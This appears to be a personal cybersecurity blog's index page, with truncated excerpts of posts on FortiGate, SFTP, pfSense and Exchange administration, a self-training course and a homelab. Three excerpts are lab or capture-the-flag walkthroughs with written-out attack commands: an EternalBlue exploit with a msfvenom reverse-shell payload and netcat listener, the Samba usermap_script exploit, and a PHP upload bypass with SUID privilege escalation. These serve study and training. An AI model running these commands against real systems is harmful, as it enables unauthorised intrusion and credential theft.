Learn smarter Try harder

Network Diagram ----------------------------------------------------------------------------------------- Background ----------------------------------------------------------------------------------------- The Network Infrastructure is: FortiGate SD-WAN with OSPF over IPSec From Site, D 172.16.4.0/24 has the Call Center Software connected to Client E 172.16.5.0/24 Call Service. You can check out how to set up SD-WAN on Fortigate on this youtube link:https://www.youtube.com/watch?v=JSYC0mqXnrg Issue ----------------------------------------------------------------------------------------- We notified that the calls from SiteD were of poor quality.   Troubleshoot ----------------------------------------------------------------------------------------- The call quality issue usually related to the Network connection. So we start troubleshooting from the network connection.      1. Test the network connection from Site D to Client E           We are able to reach to Client E ca

1. Business request     S et up a file transfer server with public internet access.  2. security concern      The common ways are FTP, FTPS, or SFTP:     The FTPS requires applying the certificates to the FTP service,  So I deceived to go for SFTP.       SolarWinds SFTP & SCP Server is a Free SFTP server App. 3. Deployment     3.1  Set up SFTP on VM          Download the software to Server and install it                https://www.solarwinds.com/free-tools/free-sftp-server          Redirect the Root Directory           Create user to login           verify the SFTP service is running on localhost     3.2 Config Host firewall and  Azure NSG to allow SFTP service           Add Port 22 TCP into host firewall           Add Port 22 TCP into Azure NSG          V erify the SFTP service is reachable for internal user      3.3 Config Fortigate firewall to allow external access              Firewall Port Fording           Firewall  policy rule with Whitelist control           Test SFTP conn

The Reason Why I roll out this course Hi All, This is Trevor Shi, I was the IT support back in 2019, I created the CyberRookie ProjectSelf training project version 1, spent a year training myself to be Security Analyst.  From my own experience, to be a qualified Cyber Analyst, it should at least match these four requirements: 1. Having the cyber-related certificated 2. Having cyber knowledge 3. Having cyber hands-on skills 4. With IT work Experience The CyberRookie Course is trying to cover these 4 domains with limited cost to get free cyber-related certificated, gain cyber knowledge, practice cyber hands-on skills, and get a deep understanding of IT systems.  I believe that How good you are at cybersecurity is based on how deep you understanding the IT system. CyberRookie Project CyberRookie Project is an 8 weeks self-Studying project. Currently is in version 2.1. Our goals  are to help people with limited IT/Cyber background into IT/Cyber field can: Learning cyber skills from a free

  To Be A Cyber Man: Trevor Shi CyberSecurity Blue team HomeLab V3.0     I recently updated my cybersecurity  HomeLab . The design is more focused on the Bule team. T his lab design can provide basic functionally IT services with continual protection and log monitoring to detect the cyber attack.     Upgraded history:     1. Upgraded  virtualization solution from Vmware player to Vmware ESXi.     2.  Added WatchGuard Firewall as the gateway.       3. Added  virtual  PfSense Firewall in front of BuleTeam Lab as the gateway.     4. Deployed EVE-NG  with Fortigate firewall SD-WAN and PaloAlto lab.      Licensing and Cost:     One of the benefits of this Lab is  saving money. Buying one i5 PC can set it up. You do not need to put a physical firewall in front of the network, The virtual FW works just fine.      Diagram:

OX01 Preface My company recently upgraded its firewall to FortiGate Firewall.  They eliminated 3 of the licenses expired WatchGuard Firebox Firewalls. The WatchGuard FireBox models are XTM5 Series, M400, and M470. I was wondering if I can install the opensource Firewall application such as PfSense on FireBox to use as Testing Lab Environment. 0X02 Information      XTM5 Series comes with a 1GB CF card, free space is not enough for the lastest Pfsense,  need to add additional Hard Disk as PfSense system booting drive.     M400 comes with a 4 GB CF card, can use CF card as a PfSense system booting drive.     M470 comes with mSTAT SSD.  can SSD as a PfSense system booting drive. 0X03 Installing PfSense on M400 1. Preparation:           WatchGuard Firebox M400 Appliance          A USB Flash Drive          A CF Card USB reader          A console cable (not necessary) 2. download Pfsense       https://www.pfsense.org/download 3. Download Rufus https://rufus.ie/ 4. Use Rufus to create a Pfsens

Notification: This is not a technical step-by-step guide.  Summary a. Initial Access     N/A b. User Access          N/A c. Root Access     smb-vuln-ms17-010 Tips a. nmap vuln scan can be helpful b. MSF command "hashdump" can get hash file c. use John and hashcat to crack the NTLM hash file Procedure 1. Port Scan     Nmap     $nmap -A -p- -T4 10.10.101.135     $ nmap -Pn -n -sV --script vuln -oN vuln.txt 10.10.101.135 2. Exploit     Python Script      Get Exploit from Github $git clone https://github.com/helviojunior/MS17-010.git Generate the shell           $msfvenom -p windows/shell_reverse_tcp LHOST=10.10.101.135 LPORT=8888 -f exe >                   shell.exe           Run Netcat $nc -nlvp 8888 Exploit           $python send_and_execute.py 10.10.101.135 shell.exe     MSF          > use exploit/windows/smb/ms17_010_eternalblue          > show options          > set RHOSTS 10.10.101.135           > set LHOST tun0          >run 3. Crask the NTLM

  Notification: This is not a technical step-by-step guide.  Summary a. Initial Access      N/A b. User Access      N/A c. Root Access     Samba 3.0.X 'username' map script Command Execution Tips a. FTP, SSH has less chance to exploit it. b. Enumeration Procedure 1. Port Scan     $nmap -p- -sV --open 10.10.10.3     $nmap -A -p- -T4 10.10.10.3 2. Service Enumeration     Port 21            vsFTPd 2.3.4          Anonymous login, no file, no access to upload          exploit, MSF backdoor command execution not working     Port 22           SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1           Ssh with password      Port 139, 445           Samba 3.x -4.x            Samba 3.0.20-Debian No Nmap common exploit           't mp' folder with R/W permission           Searchsploit samba 3.0 got CVE-2007-2447          MSF search samba 3.0 got samba/usermap_script 3. Exploit     Python script      https://github.com/amriunix/CVE-2007-2447      Root file:     MSF     

Notification: This is not a technical step-by-step guide.  Summary a. Initial Access      Web upload RCE b. User Access      Web upload RCE c. Root Access      SUID /bin/systemctl Tips a. Gobuster should at least run twice to enumerate the first round found folder. b. Common Php extensions .php          .php1          .php2 .php3 .php4 .php5 .phtml c. To identify which extensions are not blocked can use:     Fuzz to upload form     Burp Suite set the payload to "sniper" to attack Procedure 1. Port Scan     $ nmap -vv 10.10.132.213  ##scan top 1000 ports     $ nmap -sV 10.10.132.213 ##scan top 1000 ports with port service version     $ nmap -A -p- -T4 10.10.132.213  ##All os/service, all ports, fast module      2. Service Enumation 21 Port Vsftpd 3.0.3 No anonymous login No exploit 22 Port SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.7 139, 445 Port 3138 Port 3333 Port      Web http server      Gobuster found /internal/ upload location      Gobuster found/internal/u

 OSCP Preparation: Tool part 1 - Nmap  1. How to get started quickly with one tool?     1.1 R ead tool man command details               $man nmap             1.2 Familiar with  Scanning command syntax and usage options           1.2.1  Scanning command syntax                     $nmap -sV $IP         1.2.2   usage options                    1.3 Make your own Cheat Sheet          $          $          $     1.4 Some Tips          1.4.1 Nmap script          1.4.2 Scan order     1.5  Practice makes perfect.

  To be A CyberMan: The Exchange Mobile Access Rules Troubleshooting 0X00: Preview Knowlege The company deceived only allows certain employees can have access to their email through mobile.  we created the Device Access Rules on the Exchange admin center. We put all Andriod and iPhone Device into Quarantined that we can decide to block or allow.  So when mobile devices try to connect to email, the user account will go to the Quarantined Devices list on the Exchange admin center, the IT department will grant access to certain employees. 0X01: Issue Some employees were not able to log into Mobile email, got the notification from exchange says: ------------------- Your device is temporarily blocked from synchronizing using Exchange ActiveSync until your administrator grants it access. Your request is currently pending. Thank You,  IT Department Your device is temporarily blocked from accessing content via Exchange ActiveSync because the device has been quarantined. You don't need to

To Be A CyberMan: What I have Done Within A Year (Sep2019-Sep2020)           Language Skills 1. Completed ESL 7-8 Level course 2. Made 3 public speeches, Achieved "the best speaker" 2 times in Toastmaster   Personal Development 1. Completed some Cybersecurity online training courses     a. Sans Cyber Aces Online      b. Culturelink's Cybersecurity Training Program: CSX CyberSecurity Fundamental     c. Fortinet NSE 1, 2, 4and 5Network Security Associate online Training     d. Palo Alto Networks Online Course         i. Introduction to Cybersecurity (EDU-010)         ii. Firewall 9.0 Essentials: Configuration and Management (EDU-110)         iii. Cybersecurity Skills Practice Lab     e. Qualys Training         i. Vulnerability Management         ii. Advanced Scanning     f. Cybrary course         i. pfSense: Installing and Configuring the Firewall         ii. Vmware Foundations     g. EDX course         i. Microsoft IT Support: Cloud Fundamentals